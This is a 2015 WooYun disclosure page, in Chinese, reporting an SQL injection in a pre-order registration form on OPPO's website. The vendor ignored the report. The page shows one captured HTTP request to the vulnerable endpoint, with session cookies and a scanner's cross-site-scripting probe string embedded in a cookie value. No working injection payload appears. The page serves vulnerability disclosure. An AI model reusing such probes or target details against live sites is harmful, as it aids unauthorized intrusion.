当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154014

漏洞标题:OPPO主站存在SQL注入漏洞

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: 路人甲

提交时间:2015-11-19 10:36

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /my/r7-plus-preorder/Registration.php HTTP/1.1
Content-Length: 423
Content-Type: application/x-www-form-urlencoded
Cookie: oppo_session=eyJpdiI6InBhVURVXC9CS2pORm13RTFFdExIU3h3PT0iLCJ2YWx1ZSI6InR4eUNyVDkyQURJcmpTbjNnY2RQZ25ucEVLdFZ0Q3pcL1BReUExXC9SbVhPZHM3TXRmQmMzdjZaZ252NE43XC9NSjVVVXF1MUNwUnRhOHd1RW5iM2VJWTBBPT0iLCJtYWMiOiIxMGZiNmJlNWY3ZGFkZTAyMmZkZDYxNGVhNzY5MGMwZjdiYmQyMTRjYTAxYTM5ZjJmNjQ0OTZmYTE4YzI1MzcxIn0%3D; en=eyJpdiI6IngzTFpOZmFkZ28rcnpMT2FHTUNXM2c9PSIsInZhbHVlIjoiUFB2dXNPVDExRlJqbXpmdXdESzdOUlJiZGJQMXdUNVZRckRTN1VCUXNVUEZKbEI2UzhZVVRBRXM4Qmo1Vjd1elhTWlJNOVg4XC94Y094QThRaU1SOEtBPT0iLCJtYWMiOiI3OTE3M2UxMTZjZTNkNDhhNzUxNjZhZDg4ZDg2YmYxNTNkOTE0ZDkyZDg1MzZmZGE0ZWNkMWZlNGQ2NzBlYWZhIn0%3D; laravel_session=eyJpdiI6IklrUkVQWGh2a1AxMDk0N2VaSHRxN2c9PSIsInZhbHVlIjoiY3VCbzh1alBTZzd5YVhEdEs0V2hpWHpRQ0Zrekp0dThhcVpCcVFCZE51UXpZXC95ak9wWnpDaVwvXC9LM1JGQndUR05NNlhWSm4zRWphcnZZZHFpKzJ2clE9PSIsIm1hYyI6ImM1MTAxMjk2MjRlZTZjMzRhYjYyZWM0MDQ2OGEwMGY2YzA4YWVlZDE1M2E4M2M4ZmI2MjU2YTI1ZmY1MTI3MGYifQ%3D%3D; 97526a62b6f96ebafb6ea58e8c088533=54j3qs12as7bv58m2ecesn82s0; PHPSESSID=abtppag7ft3anqr3qa6cud8pq7; frontend=dsd64qp9g455n17nd5pukkaqg2; nf_wp_session=793fddc88e46249327c0a90dff931e96%7C%7C1447523562%7C%7C1447523502; bmec=0f9bd21f216ddfddef1671ab66504fc1; wordpress_test_cookie=WP+Cookie+check; Hm_lvt_f18367c55fd7569d9000cd9986846577=1447523250,1447523333,1447525836,1447529536; Hm_lpvt_f18367c55fd7569d9000cd9986846577=1447529536; BAIDUID=1F69F639118F984B8D2DDB33A0FD6586:FG=1; HMACCOUNT=7BB432FFBC83C70F; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1447523329,1447523333,1447523342,1447529547; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1447529547; UNID=9F4E727C02AE64564771D2; __cs_visitor=1447522791107363; __v3_cs_skey_10034=d307fe; __utmt=1; __utma=171233918.1111442545.1447522819.1447522819.1447522819.1; __utmb=171233918.2.10.1447522819; __utmc=171233918; __utmz=171233918.1447522819.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); shopGoodsId=513; _ga=GA1.2.1111442545.1447522819; _gat=1; _dc_gtm_UA-53259506-1=1; oppocom=a%3A8%3A%7Bs%3A7%3A%22REQUEST%22%3Bi%3A43685%3Bs%3A7%3A%22CHARSET%22%3Bs%3A5%3A%22utf-8%22%3Bs%3A6%3A%22USERID%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22DOMAINID%22%3Bi%3A1%3Bs%3A7%3A%22AGENTID%22%3Bi%3A0%3Bs%3A8%3A%22LANGUAGE%22%3Bs%3A2%3A%22sp%22%3Bs%3A7%3A%22SERVICE%22%3Bs%3A1%3A%221%22%3Bs%3A14%3A%22GUEST_LOGIN_ID%22%3Bs%3A1%3A%220%22%3B%7D; _gat_UA-54439508-1=1; _gat_UA-39533684-1=1; bannerslider_user_code_impress3=39a97a28fd77f54b76af179dac178635; bannerslider_user_code_click50=0826c53292cfc2240cdcc40aea1b98fa; bannerslider_user_code_click51=d22ad251caa88eaa1cb922162b7c7349; external_no_cache=1; __atuvc=4%7C46; __atuvs=564777c3628394dc003
Host: www.oppo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=sample%40email.tst&icnumber=1111&location=1&name=bikrgyhm&phonenumber=555-666-0606&state=NY&store=1

1.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无